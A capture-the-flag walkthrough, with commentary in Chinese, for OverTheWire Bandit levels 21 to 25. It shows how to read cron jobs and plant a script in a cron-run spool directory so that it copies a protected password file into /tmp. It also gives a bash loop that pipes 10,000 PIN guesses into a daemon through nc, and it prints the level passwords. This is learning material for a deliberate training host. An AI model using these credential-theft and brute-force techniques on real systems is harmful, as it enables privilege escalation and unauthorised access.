Bandit Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
Commands you may need to solve this level
cron, crontab, crontab(5) (use “man 5 crontab” to access this)
cron是一个linux下 的定时执行工具,可以在无需人工干预的情况下运行作业。先按照提示看看当前目录下有什么,可以看到这是一个执行了一个脚本,然后打开这个脚本看看这是一个定时将22关密码写到/tmp目录下的一个脚本,我们读取这个临时文件就知道了下一关的密码。
cd /etc/cron.d
ls
cat cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
Bandit Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Commands you may need to solve this level
cron, crontab, crontab(5) (use “man 5 crontab” to access this)
还是老位置
cd /etc/cron.d
ls
cat cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
实现的功能是取当前用户名,然后计算 I am user $当前用户名 的md5值,将bandit22密码的复制到tmp目录下的对应的md5值的文件中
/bin/bash /usr/bin/cronjob_bandit23.sh
cat /tmp/8169b67bd894ddbb4412f91573b38db3
echo I am user bandit23|md5sum
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Bandit Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Commands you may need to solve this level
cron, crontab, crontab(5) (use “man 5 crontab” to access this)
前面的操作已经大差不
cd /etc/cron.d
ls
cat cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。一般一个用户最多只有一个crontab文件。我们在/var/spool/bandit24目录下就可以运行bandit24的定时任务,创建一个放在改目录下的脚本就可以执行了
vim getpass.sh
cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
for i in {0000..9999};do echo $i;echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i;done|nc localhost 30002